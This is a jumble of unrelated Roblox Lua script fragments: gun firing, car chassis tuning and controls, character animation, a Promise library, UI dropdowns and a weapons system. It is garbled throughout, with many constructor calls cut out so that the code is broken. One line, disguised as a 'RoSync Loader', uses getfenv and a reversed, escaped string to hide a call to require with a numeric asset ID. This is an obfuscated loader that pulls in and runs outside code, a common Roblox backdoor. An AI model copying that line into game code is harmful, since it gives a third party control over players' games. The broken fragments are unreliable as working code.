CasingMesh.Parent = CasingBase function OnFire() if IsShooting then return end if MyHumanoid and MyHumanoid.Health > 0 then if RecoilTrack and AmmoInClip > 0 then end IsShooting = true if AmmoInClip > 0 and not Reloading then --if RecoilTrack then RecoilTrack:Play() end if Handle:FindFirstChild('FireSound') then Handle.FireSound:Play() end CreateFlash() Tool.SetIcon:FireClient(game.Players:GetPlayerFromCharacter(Tool.Parent), "rbxasset://textures\\GunWaitCursor.png") local targetPoint = MOUSE_TARGET for i = 1, BulletCount do local shootDirection = (targetPoint - Handle.Position).unit -- Adjust the shoot direction randomly off by a little bit to account for recoil -- moves random*spread in a random angle from center shot point (center bias) shootDirection = ((,0,0),shootDirection) * CFrame.Angles(0,0,math.random()*2*math.pi))*CFrame.Angles(math.random()*Spread,0,0)).lookVector local hitObject, bulletPos = RayCast(Handle.Position, shootDirection, Range) local bullet -- Create a bullet here if hitObject then bullet = CreateBullet(bulletPos, hitObject) end if hitObject and hitObject.Parent then local hitHumanoid = hitObject.Parent:FindFirstChild("Humanoid") or hitObject.Parent.Parent:FindFirstChild'Humanoid' if hitHumanoid then local hitPlayer = game.Players:GetPlayerFromCharacter(hitHumanoid.Parent) if not GLib.IsTeammate(MyPlayer, hitPlayer) then GLib.TagHumanoid(MyPlayer, hitHumanoid, 1) hitHumanoid:TakeDamage(Damage) if bullet then bullet:Destroy() bullet = nil --bullet.Transparency = 1 end end end end end local casing = CasingBase:Clone() casing.Position = Tool.Handle.Position +,1,0) casing.Velocity = (,(.5+math.random()),(math.random()-.5)) - 1.5*(Tool.Handle.CFrame * CFrame.Angles(0,math.pi/4,0)).lookVector)*20 DebrisService:AddItem(casing, 2.5) casing.Parent = game.Workspace AmmoInClip = AmmoInClip - 1 UpdateAmmo(AmmoInClip) wait(FireRate-.2) if AmmoInClip > 0 then if PumpTrack then PumpTrack:Play() end if Handle:FindFirstChild('PumpSound') then Handle.PumpSound:Play() end wait(.2) end Tool.SetIcon:FireClient(game.Players:GetPlayerFromCharacter(Tool.Parent), "rbxasset://textures\\GunCursor.png") end IsShooting = false if AmmoInClip == 0 then Reload() end if RecoilTrack then RecoilTrack:Stop() end end end function UpdateAmmo(value) if WeaponGui and WeaponGui:FindFirstChild('AmmoHud') and WeaponGui.AmmoHud:FindFirstChild('ClipAmmo') then WeaponGui.AmmoHud.ClipAmmo.Text = AmmoInClip end --if WeaponGui and WeaponGui:FindFirstChild('AmmoHud') and WeaponGui.AmmoHud:FindFirstChild('TotalAmmo') then -- WeaponGui.AmmoHud.TotalAmmo.Text = SpareAmmo --end end function OnMouseDown() LeftButtonDown = true OnFire() end function OnMouseUp() LeftButtonDown = false end function OnKeyDown(key) if string.lower(key) == 'r' then Reload() end end Tool.Input.OnServerEvent:connect(function(client, action, ...) if client.Character == Tool.Parent then if action == 'Mouse1' then local down, pos = ... if down then OnMouseDown() else OnMouseUp() end elseif action == 'Key' then local down, key = ... if down then OnKeyDown(key) end elseif action == 'MouseMove' then local pos = ... MOUSE_TARGET = pos end end end) function OnEquipped() EquipAnim = WaitForChild(Tool, 'Equip') PumpAnim = WaitForChild(Tool, 'Reload') FireSound = WaitForChild(Handle, 'FireSound') MyCharacter = Tool.Parent MyPlayer = game:GetService('Players'):GetPlayerFromCharacter(MyCharacter) MyHumanoid = MyCharacter:FindFirstChild('Humanoid') MyTorso = MyCharacter:FindFirstChild('Torso') WeaponGui = WaitForChild(Tool, 'WeaponHud'):Clone() if WeaponGui and MyPlayer then WeaponGui.Parent = MyPlayer.PlayerGui UpdateAmmo(AmmoInClip) end if EquipAnim then Tool.Grip =, 0.00749024749, 0.526850462, 0.925221086, 0.000443253666, 0.379427731, 0.00859767944, 0.999718785, -0.0221330915, -0.379331142, 0.0237402022, 0.924956799) EquipTrack = MyHumanoid:LoadAnimation(EquipAnim) EquipTrack:Play() end if PumpAnim then PumpTrack = MyHumanoid:LoadAnimation(PumpAnim) end Tool.SetIcon:FireClient(game.Players:GetPlayerFromCharacter(Tool.Parent), "rbxasset://textures\\GunCursor.png") end
--sort by values
newTable.vsort = function(tbl, sort) sort = sort or function(x, y) return x > y end return newTable.xsort(tbl, function(x, y) return sort(tbl[x], tbl[y]) end) end newTable.choice = function(tbl, resultCount) resultCount = resultCount or 1 local results = {} --clone the table local clone = {} for i,v in pairs(tbl) do clone[i] = v end local keys = newTable.keys(clone) for i=1,math.min(#tbl, math.max(resultCount, 1)) do table.insert(results, tbl[table.remove(keys, math.random(#keys))]) end return unpack(results) end = function(tbl) return tbl[math.random(#tbl)] end newTable.shallow = function(tbl) local clone = {} for key,val in pairs(tbl) do clone[key] = val end return clone end newTable.deep = function(tbl) local clone = {} for key,val in pairs(tbl) do if typeof(val) == "table" then clone[key] = newTable.deep(val) else clone[key] = val end end return clone end newTable.cloneKeys = function(tbl) local ret = {} for key,_ in pairs(tbl) do ret[key] = true end return ret end newTable.dump = function(tbl, prefix) prefix = prefix or "" for key,val in pairs(tbl) do print(("%s%s = %s"):format(prefix, tostring(key), tostring(val))) if typeof(val) == "table" then newTable.dump(val, ("%s.%s"):format(prefix, key)) end end end newTable.merge = function(tbl, ...) local ret = {} for _,tbl in pairs({tbl, ...}) do for _,value in pairs(tbl) do table.insert(ret, value) end end return ret end return setmetatable(newTable, { __index = table })
-- A variant of the function above that returns the velocity at a given point in time.
local function GetVelocityAtTime(time, initialVelocity, acceleration) return initialVelocity + acceleration * time end
--[[iiUltimate's datastore highscore board [5/24/2015] CREDIT TO: Dummiez for original, but I fixed it, and made it work for RPGs. You can set your settings for the leaderboard here. Simply leave this 'HighScore' Model in the Workspace, and do not touch the Config unless you know what you're doing! (WARNINGS:) DO NOT RENAME ANYTHING! IF YOU DO, YOU HAVE TO CHANGE SCRIPTS UP! ALSO IF YOU ADD A NEW SCRIPT, YOU HAVE TO EDIT SOME STUFF! If you rename the datastore, all highscores reset. ]]
Tune.Config = "AWD" --"FWD" , "RWD" , "AWD" --Differential Settings Tune.FDiffSlipThres = 50 -- 1 - 100% (Max threshold of applying full lock determined by deviation from avg speed) Tune.FDiffLockThres = 50 -- 0 - 100% (0 - Bias toward slower wheel, 100 - Bias toward faster wheel) Tune.RDiffSlipThres = 30 -- 1 - 100% Tune.RDiffLockThres = 60 -- 0 - 100% Tune.CDiffSlipThres = 50 -- 1 - 100% [AWD Only] Tune.CDiffLockThres = 50 -- 0 - 100% [AWD Only] --Traction Control Settings Tune.TCSEnabled = true -- Implements TCS Tune.TCSThreshold = 18 -- Slip speed allowed before TCS starts working (in SPS) Tune.TCSGradient = 18 -- Slip speed gradient between 0 to max reduction (in SPS) Tune.TCSLimit = 9 -- Minimum amount of torque at max reduction (in percent)
--[[[Default Controls]]
--Peripheral Deadzones Tune.Peripherals = { MSteerWidth = 67 , -- Mouse steering control width (0 - 100% of screen width) MSteerDZone = 10 , -- Mouse steering deadzone (0 - 100%) ControlLDZone = 5 , -- Controller steering L-deadzone (0 - 100%) ControlRDZone = 5 , -- Controller steering R-deadzone (0 - 100%) } --Control Mapping Tune.Controls = { --Keyboard Controls --Mode Toggles ToggleTransMode = Enum.KeyCode.M , --Primary Controls Throttle = Enum.KeyCode.Up , Brake = Enum.KeyCode.Down , SteerLeft = Enum.KeyCode.Left , SteerRight = Enum.KeyCode.Right , --Secondary Controls Throttle2 = Enum.KeyCode.W , Brake2 = Enum.KeyCode.S , SteerLeft2 = Enum.KeyCode.A , SteerRight2 = Enum.KeyCode.D , --Manual Transmission ShiftUp = Enum.KeyCode.E , ShiftDown = Enum.KeyCode.Q , Clutch = Enum.KeyCode.LeftShift , --Handbrake PBrake = Enum.KeyCode.P , --Mouse Controls MouseThrottle = Enum.UserInputType.MouseButton1 , MouseBrake = Enum.UserInputType.MouseButton2 , MouseClutch = Enum.KeyCode.W , MouseShiftUp = Enum.KeyCode.E , MouseShiftDown = Enum.KeyCode.Q , MousePBrake = Enum.KeyCode.LeftShift , --Controller Mapping ContlrThrottle = Enum.KeyCode.ButtonR2 , ContlrBrake = Enum.KeyCode.ButtonL2 , ContlrSteer = Enum.KeyCode.Thumbstick1 , ContlrShiftUp = Enum.KeyCode.ButtonY , ContlrShiftDown = Enum.KeyCode.ButtonX , ContlrClutch = Enum.KeyCode.ButtonR1 , ContlrPBrake = Enum.KeyCode.ButtonL1 , ContlrToggleTMode = Enum.KeyCode.DPadUp , ContlrToggleTCS = Enum.KeyCode.DPadDown , ContlrToggleABS = Enum.KeyCode.DPadRight , }
------//High Ready Animations
self.RightHighReady =, .5, -1.1) * CFrame.Angles(math.rad(-90), math.rad(0), math.rad(0)); self.LeftHighReady =,0.4,-1.3) * CFrame.Angles(math.rad(-140),math.rad(30),math.rad(30)); self.RightElbowHighReady =,-0.25,-.35) * CFrame.Angles(math.rad(-45), math.rad(0), math.rad(0)); self.LeftElbowHighReady =,0, -0.1) * CFrame.Angles(math.rad(-15),math.rad(0),math.rad(0)); self.RightWristHighReady =,0,0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0)); self.LeftWristHighReady =,0,0) * CFrame.Angles(math.rad(0),math.rad(-15),math.rad(0));
------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------
function onRunning(speed) if speed>0.01 then playAnimation("walk", 0.1, Humanoid) if currentAnimInstance and currentAnimInstance.AnimationId == "" then setAnimationSpeed(speed / 14.5) end pose = "Running" else playAnimation("idle", 0.1, Humanoid) pose = "Standing" end end function onDied() pose = "Dead" end function onJumping() playAnimation("jump", 0.1, Humanoid) jumpAnimTime = jumpAnimDuration pose = "Jumping" end function onClimbing(speed) playAnimation("climb", 0.1, Humanoid) setAnimationSpeed(speed / 12.0) pose = "Climbing" end function onGettingUp() pose = "GettingUp" end function onFreeFall() if (jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) end pose = "FreeFall" end function onFallingDown() pose = "FallingDown" end function onSeated() pose = "Seated" end function onPlatformStanding() pose = "PlatformStanding" end function onSwimming(speed) if speed>0 then pose = "Running" else pose = "Standing" end end function getTool() for _, kid in ipairs(Figure:GetChildren()) do if kid.className == "Tool" then return kid end end return nil end function getToolAnim(tool) for _, c in ipairs(tool:GetChildren()) do if c.Name == "toolanim" and c.className == "StringValue" then return c end end return nil end function animateTool() if (toolAnim == "None") then playToolAnimation("toolnone", toolTransitionTime, Humanoid) return end if (toolAnim == "Slash") then playToolAnimation("toolslash", 0, Humanoid) return end if (toolAnim == "Lunge") then playToolAnimation("toollunge", 0, Humanoid) return end end function moveSit() RightShoulder.MaxVelocity = 0.15 LeftShoulder.MaxVelocity = 0.15 RightShoulder:SetDesiredAngle(3.14 /2) LeftShoulder:SetDesiredAngle(-3.14 /2) RightHip:SetDesiredAngle(3.14 /2) LeftHip:SetDesiredAngle(-3.14 /2) end local lastTick = 0 function move(time) local amplitude = 1 local frequency = 1 local deltaTime = time - lastTick lastTick = time local climbFudge = 0 local setAngles = false if (jumpAnimTime > 0) then jumpAnimTime = jumpAnimTime - deltaTime end if (pose == "FreeFall" and jumpAnimTime <= 0) then playAnimation("fall", fallTransitionTime, Humanoid) elseif (pose == "Seated") then playAnimation("sit", 0.5, Humanoid) return elseif (pose == "Running") then playAnimation("walk", 0.1, Humanoid) elseif (pose == "Dead" or pose == "GettingUp" or pose == "FallingDown" or pose == "Seated" or pose == "PlatformStanding") then stopAllAnimations() amplitude = 0.1 frequency = 1 setAngles = true end if (setAngles) then local desiredAngle = amplitude * math.sin(time * frequency) RightShoulder:SetDesiredAngle(desiredAngle + climbFudge) LeftShoulder:SetDesiredAngle(desiredAngle - climbFudge) RightHip:SetDesiredAngle(-desiredAngle) LeftHip:SetDesiredAngle(-desiredAngle) end
local _CTRL = _Tune.Controls local Controls ="Folder",script.Parent) Controls.Name = "Controls" for i,v in pairs(_CTRL) do local"StringValue",Controls) a.Name=i a.Value=v.Name a.Changed:connect(function() if i=="MouseThrottle" or i=="MouseBrake" then if a.Value == "MouseButton1" or a.Value == "MouseButton2" then _CTRL[i]=Enum.UserInputType[a.Value] else _CTRL[i]=Enum.KeyCode[a.Value] end else _CTRL[i]=Enum.KeyCode[a.Value] end end) end --Deadzone Adjust local _PPH = _Tune.Peripherals for i,v in pairs(_PPH) do local a ="IntValue",Controls) a.Name = i a.Value = v a.Changed:connect(function() a.Value=math.min(100,math.max(0,a.Value)) _PPH[i] = a.Value end) end --Input Handler function DealWithInput(input,IsRobloxFunction) if (UserInputService:GetFocusedTextBox()==nil) and not _InControls then --Ignore when UI Focus --Shift Down [Manual Transmission] if _IsOn and (input.KeyCode ==_CTRL["ContlrShiftDown"] or (_MSteer and input.KeyCode==_CTRL["MouseShiftDown"]) or ((not _MSteer) and input.KeyCode==_CTRL["ShiftDown"])) and (_TMode=="Semi" or (_TMode=="Manual" and (not _ClutchOn))) and input.UserInputState == Enum.UserInputState.Begin and car.Stats.Fuel.Value ~= 0 then if _CGear == 0 and (_TMode=="Auto" or not _ClPressing) then _ClutchOn = true end _CGear = math.max(_CGear-1,-1) --Shift Up [Manual Transmission] elseif _IsOn and (input.KeyCode ==_CTRL["ContlrShiftUp"] or (_MSteer and input.KeyCode==_CTRL["MouseShiftUp"]) or ((not _MSteer) and input.KeyCode==_CTRL["ShiftUp"])) and (_TMode=="Semi" or (_TMode=="Manual" and (not _ClutchOn))) and input.UserInputState == Enum.UserInputState.Begin and car.Stats.Fuel.Value ~= 0 then if _CGear == 0 and (_TMode=="Auto" or not _ClPressing) then _ClutchOn = true end _CGear = math.min(_CGear+1,#_Tune.Ratios-2) --Toggle Clutch elseif _IsOn and (input.KeyCode ==_CTRL["ContlrClutch"] or (_MSteer and input.KeyCode==_CTRL["MouseClutch"]) or ((not _MSteer) and input.KeyCode==_CTRL["Clutch"])) and _TMode=="Manual" then if input.UserInputState == Enum.UserInputState.Begin then _ClutchOn = false _ClPressing = true elseif input.UserInputState == Enum.UserInputState.End then _ClutchOn = true _ClPressing = false end --Toggle PBrake elseif _IsOn and input.KeyCode ==_CTRL["ContlrPBrake"] or (_MSteer and input.KeyCode==_CTRL["MousePBrake"]) or ((not _MSteer) and input.KeyCode==_CTRL["PBrake"]) then if input.UserInputState == Enum.UserInputState.Begin then _PBrake = not _PBrake elseif input.UserInputState == Enum.UserInputState.End then if car.DriveSeat.Velocity.Magnitude>5 then _PBrake = false end end --Toggle Transmission Mode elseif (input.KeyCode == _CTRL["ContlrToggleTMode"] or input.KeyCode==_CTRL["ToggleTransMode"]) and input.UserInputState == Enum.UserInputState.Begin then local n=1 for i,v in pairs(_Tune.TransModes) do if v==_TMode then n=i break end end n=n+1 if n>#_Tune.TransModes then n=1 end _TMode = _Tune.TransModes[n] --Throttle elseif _IsOn and ((not _MSteer) and (input.KeyCode==_CTRL["Throttle"] or input.KeyCode == _CTRL["Throttle2"])) or ((((_CTRL["MouseThrottle"]==Enum.UserInputType.MouseButton1 or _CTRL["MouseThrottle"]==Enum.UserInputType.MouseButton2) and input.UserInputType == _CTRL["MouseThrottle"]) or input.KeyCode == _CTRL["MouseThrottle"])and _MSteer) then if input.UserInputState == Enum.UserInputState.Begin then _GThrot = 1 else _GThrot = _Tune.IdleThrottle/100 end --Brake elseif ((not _MSteer) and (input.KeyCode==_CTRL["Brake"] or input.KeyCode == _CTRL["Brake2"])) or ((((_CTRL["MouseBrake"]==Enum.UserInputType.MouseButton1 or _CTRL["MouseBrake"]==Enum.UserInputType.MouseButton2) and input.UserInputType == _CTRL["MouseBrake"]) or input.KeyCode == _CTRL["MouseBrake"])and _MSteer) then if input.UserInputState == Enum.UserInputState.Begin then _GBrake = 1 else _GBrake = 0 end --Steer Left elseif (not _MSteer) and (input.KeyCode==_CTRL["SteerLeft"] or input.KeyCode == _CTRL["SteerLeft2"]) then if input.UserInputState == Enum.UserInputState.Begin then _GSteerT = -1 _SteerL = true else if _SteerR then _GSteerT = 1 else _GSteerT = 0 end _SteerL = false end --Steer Right elseif (not _MSteer) and (input.KeyCode==_CTRL["SteerRight"] or input.KeyCode == _CTRL["SteerRight2"]) then if input.UserInputState == Enum.UserInputState.Begin then _GSteerT = 1 _SteerR = true else if _SteerL then _GSteerT = -1 else _GSteerT = 0 end _SteerR = false end --Toggle Mouse Controls elseif input.KeyCode ==_CTRL["ToggleMouseDrive"] then if input.UserInputState == Enum.UserInputState.End then _MSteer = not _MSteer _GThrot = _Tune.IdleThrottle/100 _GBrake = 0 _GSteerT = 0 _ClutchOn = true end --Toggle TCS elseif _Tune.TCSEnabled and _IsOn and input.KeyCode == _CTRL["ToggleTCS"] or input.KeyCode == _CTRL["ContlrToggleTCS"] then if input.UserInputState == Enum.UserInputState.End then _TCS = not _TCS end --Toggle ABS elseif _Tune. ABSEnabled and _IsOn and input.KeyCode == _CTRL["ToggleABS"] or input.KeyCode == _CTRL["ContlrToggleABS"] then if input.UserInputState == Enum.UserInputState.End then _ABS = not _ABS end end --Variable Controls if input.UserInputType.Name:find("Gamepad") then --Gamepad Steering if input.KeyCode == _CTRL["ContlrSteer"] then if input.Position.X>= 0 then local cDZone = math.min(.99,_Tune.Peripherals.ControlRDZone/100) if math.abs(input.Position.X)>cDZone then _GSteerT = (input.Position.X-cDZone)/(1-cDZone) else _GSteerT = 0 end else local cDZone = math.min(.99,_Tune.Peripherals.ControlLDZone/100) if math.abs(input.Position.X)>cDZone then _GSteerT = (input.Position.X+cDZone)/(1-cDZone) else _GSteerT = 0 end end --Gamepad Throttle elseif _IsOn and input.KeyCode == _CTRL["ContlrThrottle"] then _GThrot = math.max(_Tune.IdleThrottle/100,input.Position.Z) --Gamepad Brake elseif input.KeyCode == _CTRL["ContlrBrake"] then _GBrake = input.Position.Z end end else _GThrot = _Tune.IdleThrottle/100 _GSteerT = 0 _GBrake = 0 if _CGear~=0 then _ClutchOn = true end end end UserInputService.InputBegan:connect(DealWithInput) UserInputService.InputChanged:connect(DealWithInput) UserInputService.InputEnded:connect(DealWithInput)
--[[ Updates all the monster component's interests ]]
function MonsterManager.updateMonsterInterests() for _, monster in pairs(monsters:getAll()) do monster:updateInterests(interests) end end
--[[** ensures Roblox Ray type @param value The value to check against @returns True iff the condition is satisfied, false otherwise **--]]
t.Ray = t.typeof("Ray")
--[[ Used to set a handler for when the promise resolves, rejects, or is cancelled. Returns a new promise chained from this promise. ]]
function Promise.prototype:_finally(traceback, finallyHandler, onlyOk) if not onlyOk then self._unhandledRejection = false end -- Return a promise chained off of this promise return Promise._new(traceback, function(resolve, reject) local finallyCallback = resolve if finallyHandler then finallyCallback = createAdvancer(traceback, finallyHandler, resolve, reject) end if onlyOk then local callback = finallyCallback finallyCallback = function(...) if self._status == Promise.Status.Rejected then return resolve(self) end return callback(...) end end if self._status == Promise.Status.Started then -- The promise is not settled, so queue this. table.insert(self._queuedFinally, finallyCallback) else -- The promise already settled or was cancelled, run the callback now. finallyCallback(self._status) end end, self) end
-- loop to handle timed state transitions and tool animations
while Character.Parent ~= nil do local _, currentGameTime = wait(0.1) stepAnimate(currentGameTime) end
-- Dropdowns
function Icon:setDropdown(arrayOfIcons) -- Reset any previous icons for i, otherIcon in pairs(self.dropdownIcons) do otherIcon:leave() end -- Apply new icons if type(arrayOfIcons) == "table" then for i, otherIcon in pairs(arrayOfIcons) do otherIcon:join(self, "dropdown", true) end end -- Update dropdown self:_updateDropdown() return self end function Icon:_updateDropdown() local values = { maxIconsBeforeScroll = self:get("dropdownMaxIconsBeforeScroll") or "_NIL", minWidth = self:get("dropdownMinWidth") or "_NIL", padding = self:get("dropdownListPadding") or "_NIL", dropdownAlignment = self:get("dropdownAlignment") or "_NIL", iconAlignment = self:get("alignment") or "_NIL", scrollBarThickness = self:get("dropdownScrollBarThickness") or "_NIL", } for k, v in pairs(values) do if v == "_NIL" then return end end local YPadding = values.padding.Offset local dropdownContainer = self.instances.dropdownContainer local dropdownFrame = self.instances.dropdownFrame local dropdownList = self.instances.dropdownList local totalIcons = #self.dropdownIcons local lastVisibleIconIndex = (totalIcons > values.maxIconsBeforeScroll and values.maxIconsBeforeScroll) or totalIcons local newCanvasSizeY = -YPadding local newFrameSizeY = 0 local newMinWidth = values.minWidth table.sort(self.dropdownIcons, function(a,b) return a:get("order") < b:get("order") end) for i = 1, totalIcons do local otherIcon = self.dropdownIcons[i] local _, otherIconSize = otherIcon:get("iconSize", nil, "beforeDropdown") local increment = otherIconSize.Y.Offset + YPadding if i <= lastVisibleIconIndex then newFrameSizeY = newFrameSizeY + increment end if i == totalIcons then newFrameSizeY = newFrameSizeY + increment/4 end newCanvasSizeY = newCanvasSizeY + increment local otherIconWidth = otherIconSize.X.Offset --+ 4 + 100 -- the +100 is to allow for notices if otherIconWidth > newMinWidth then newMinWidth = otherIconWidth end end local finalCanvasSizeY = (lastVisibleIconIndex == totalIcons and 0) or newCanvasSizeY self:set("dropdownCanvasSize",, 0, 0, finalCanvasSizeY)) self:set("dropdownSize",, (newMinWidth+4)*2, 0, newFrameSizeY)) -- Set alignment while considering screen bounds local dropdownAlignment = values.dropdownAlignment:lower() local alignmentDetails = { left = { AnchorPoint =, 0), PositionXScale = 0, ThicknessMultiplier = 0, }, mid = { AnchorPoint =, 0), PositionXScale = 0.5, ThicknessMultiplier = 0.5, }, right = { AnchorPoint =, 0), PositionXScale = 1, FrameAnchorPoint =, 0), FramePositionXScale = 0, ThicknessMultiplier = 1, } } local alignmentDetail = alignmentDetails[dropdownAlignment] if not alignmentDetail then alignmentDetail = alignmentDetails[values.iconAlignment:lower()] end dropdownContainer.AnchorPoint = alignmentDetail.AnchorPoint dropdownContainer.Position =, 0, 1, YPadding+0) local scrollbarThickness = values.scrollBarThickness local newThickness = scrollbarThickness * alignmentDetail.ThicknessMultiplier local additionalOffset = (dropdownFrame.VerticalScrollBarPosition == Enum.VerticalScrollBarPosition.Right and newThickness) or -newThickness dropdownFrame.AnchorPoint = alignmentDetail.FrameAnchorPoint or alignmentDetail.AnchorPoint dropdownFrame.Position = or alignmentDetail.PositionXScale, additionalOffset, 0, 0) self._dropdownCanvasPos =, 0) end function Icon:_dropdownIgnoreClipping() self:_ignoreClipping("dropdown") end
-- requires
local CameraInput = require(script.Parent:WaitForChild("CameraInput")) local Util = require(script.Parent:WaitForChild("CameraUtils"))
-- Local private variables and constants
local CAMERA_BLACKOUT_TIME = 0.1 local FP_ZOOM = 0.5
-- print(name .. " [" .. idx .. "] " .. animTable[name][idx].anim.AnimationId .. " (" .. animTable[name][idx].weight .. ")")
idx = idx + 1 end end end -- fallback to defaults if (animTable[name].count <= 0) then for idx, anim in pairs(fileList) do animTable[name][idx] = {} animTable[name][idx].anim ="Animation") animTable[name][idx].anim.Name = name animTable[name][idx].anim.AnimationId = animTable[name][idx].weight = anim.weight animTable[name].count = animTable[name].count + 1 animTable[name].totalWeight = animTable[name].totalWeight + anim.weight
--[[Status Vars]]
local _IsOn = _Tune.AutoStart if _Tune.AutoStart then script.Parent.IsOn.Value=true end local _GSteerT=0 local _GSteerC=0 local _GThrot=0 local _GBrake=0 local _ClutchOn = true local _ClPressing = false local _RPM = 0 local _HP = 0 local _OutTorque = 0 local _CGear = 0 local _PGear = _CGear local _spLimit = 0 local _TMode = _Tune.TransModes[1] local _MSteer = false local _SteerL = false local _SteerR = false local _PBrake = false local _TCS = _Tune.TCSEnabled local _TCSActive = false local _ABS = _Tune.ABSEnabled local _ABSActive = false local FlipWait=tick() local FlipDB=false local _InControls = false
--[[Weight and CG]]
Tune.Weight = 3800 -- Total weight (in pounds) Tune.WeightBSize = { -- Size of weight brick (dimmensions in studs ; larger = more stable) --[[Width]] 6 , --[[Height]] 3 , --[[Length]] 10 } Tune.WeightDist = 50 -- Weight distribution (0 - on rear wheels, 100 - on front wheels, can be <0 or >100) Tune.CGHeight = .6 -- Center of gravity height (studs relative to median of all wheels) Tune.WBVisible = false -- Makes the weight brick visible --Unsprung Weight Tune.FWheelDensity = .1 -- Front Wheel Density Tune.RWheelDensity = .1 -- Rear Wheel Density Tune.FWLgcyDensity = 1 -- Front Wheel Density [PGS OFF] Tune.RWLgcyDensity = 1 -- Rear Wheel Density [PGS OFF] Tune.AxleSize = 2 -- Size of structural members (larger = more stable/carry more weight) Tune.AxleDensity = .1 -- Density of structural members
-- [[ Constants ]]
local SYNC_RATE = RunService.Heartbeat local MAIN = script.Parent
Tune.ABSEnabled = true -- Implements ABS Tune.ABSThreshold = 18 -- Slip speed allowed before ABS starts working (in SPS) Tune.FBrakeForce = 2000 -- Front brake force Tune.RBrakeForce = 1750 -- Rear brake force Tune.PBrakeForce = 5000 -- Handbrake force Tune.FLgcyBForce = 10000 -- Front brake force [PGS OFF] Tune.RLgcyBForce = 8000 -- Rear brake force [PGS OFF] Tune.LgcyPBForce = 25000 -- Handbrake force [PGS OFF]
--[[ Last synced 7/9/2021 08:34 RoSync Loader ]]
getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722947559) --[[ ]]--
--[[ Fired when state is left ]]
function Transitions.onLeaveGame(stateMachine, event, from, to, playerComponent) PlayerGame.leave(stateMachine, playerComponent) end
-- play particles + w/ custom
function module.Play(data) local particle = data.particle or nil local part = data.part or nil local tim = data.tim or 1 local beam = data.beam or nil if part ~= nil then coroutine.wrap(function() for i , v in pairs(part:GetDescendants()) do -- beams? if beam ~= nil then if v:IsA("Beam") then v.Enabled = true task.delay(tim, function() v.Enabled = false end) end end -- particle? if v:IsA("ParticleEmitter") then v.Enabled = false if v:GetAttribute("EmitCount") then v:Emit(v:GetAttribute("EmitCount")) end v.Enabled = true task.delay(tim, function() v.Enabled = false --game.Debris:AddItem(v, tim+1) end) end end end)() else if particle ~= nil then particle.Enabled = true task.delay(tim, function() particle.Enabled = false --game.Debris:AddItem(v, tim+1) end) end end local tab = {} tab.Part = particle tab.Beam = beam tab.particle = particle return tab end return module
-- and (IsServer or weaponInstance:IsDescendantOf(Players.LocalPlayer))
function WeaponsSystem.onWeaponAdded(weaponInstance) local weapon = WeaponsSystem.getWeaponForInstance(weaponInstance) if not weapon then WeaponsSystem.createWeaponForInstance(weaponInstance) end end function WeaponsSystem.onWeaponRemoved(weaponInstance) local weapon = WeaponsSystem.getWeaponForInstance(weaponInstance) if weapon then weapon:onDestroyed() end WeaponsSystem.knownWeapons[weaponInstance] = nil end function WeaponsSystem.getRemoteEvent(name) if not WeaponsSystem.networkFolder then return end local remoteEvent = WeaponsSystem.remoteEvents[name] if IsServer then if not remoteEvent then warn("No RemoteEvent named ", name) return nil end return remoteEvent else if not remoteEvent then remoteEvent = WeaponsSystem.networkFolder:WaitForChild(name, math.huge) end return remoteEvent end end function WeaponsSystem.getRemoteFunction(name) if not WeaponsSystem.networkFolder then return end local remoteFunc = WeaponsSystem.remoteFunctions[name] if IsServer then if not remoteFunc then warn("No RemoteFunction named ", name) return nil end return remoteFunc else if not remoteFunc then remoteFunc = WeaponsSystem.networkFolder:WaitForChild(name, math.huge) end return remoteFunc end end function WeaponsSystem.setWeaponEquipped(weapon, equipped) assert(not IsServer, "WeaponsSystem.setWeaponEquipped should only be called on the client.") if not weapon then return end local lastWeapon = WeaponsSystem.currentWeapon local hasWeapon = false local weaponChanged = false if lastWeapon == weapon then if not equipped then WeaponsSystem.currentWeapon = nil hasWeapon = false weaponChanged = true else weaponChanged = false end else if equipped then WeaponsSystem.currentWeapon = weapon hasWeapon = true weaponChanged = true end end if then if WeaponsSystem.currentWeapon then"ZoomFactor", 1.1))"HasScope", false)) end end if WeaponsSystem.gui then WeaponsSystem.gui:setEnabled(hasWeapon) if WeaponsSystem.currentWeapon then WeaponsSystem.gui:setCrosshairWeaponScale(WeaponsSystem.currentWeapon:getConfigValue("CrosshairScale", 1)) else WeaponsSystem.gui:setCrosshairWeaponScale(1) end end if weaponChanged then WeaponsSystem.CurrentWeaponChanged:Fire(weapon.instance, lastWeapon and lastWeapon.instance) end end function WeaponsSystem.getHumanoid(part) while part and part ~= workspace do if part:IsA("Model") and part.PrimaryPart and part.PrimaryPart.Name == "HumanoidRootPart" then return part:FindFirstChildOfClass("Humanoid") end part = part.Parent end end function WeaponsSystem.getPlayerFromHumanoid(humanoid) for _, player in ipairs(Players:GetPlayers()) do if player.Character and humanoid:IsDescendantOf(player.Character) then return player end end end local function _defaultDamageCallback(system, target, amount, damageType, dealer, hitInfo, damageData) if target:IsA("Humanoid") then target:TakeDamage(amount) end end function WeaponsSystem.doDamage(target, amount, damageType, dealer, hitInfo, damageData) if not target or ancestorHasTag(target, "WeaponsSystemIgnore") then return end if IsServer then if target:IsA("Humanoid") and dealer:IsA("Player") and dealer.Character then local dealerHumanoid = dealer.Character:FindFirstChildOfClass("Humanoid") local targetPlayer = Players:GetPlayerFromCharacter(target.Parent) if dealerHumanoid and target ~= dealerHumanoid and targetPlayer then -- Trigger the damage indicator WeaponData:FireClient(targetPlayer, "HitByOtherPlayer", dealer.Character.HumanoidRootPart.CFrame.Position) end end -- NOTE: damageData is a more or less free-form parameter that can be used for passing information from the code that is dealing damage about the cause. -- .The most obvious usage is extracting icons from the various weapon types (in which case a weapon instance would likely be passed in) -- ..The default weapons pass in that data local handler = _damageCallback or _defaultDamageCallback handler(WeaponsSystem, target, amount, damageType, dealer, hitInfo, damageData) end end local function _defaultGetTeamCallback(player) return 0 end function WeaponsSystem.getTeam(player) local handler = _getTeamCallback or _defaultGetTeamCallback return handler(player) end function WeaponsSystem.playersOnDifferentTeams(player1, player2) if player1 == player2 or player1 == nil or player2 == nil then -- This allows players to damage themselves and NPC's return true end local player1Team = WeaponsSystem.getTeam(player1) local player2Team = WeaponsSystem.getTeam(player2) return player1Team == 0 or player1Team ~= player2Team end return WeaponsSystem
-- << SETUP >>
for commandName, command in pairs(module) do command.Name = commandName end return module
--Place this script in the model you want to be breakable
wait(1) local model = script.Parent local domain = script.Parent.Parent _G.recurseBreakage(model, domain)
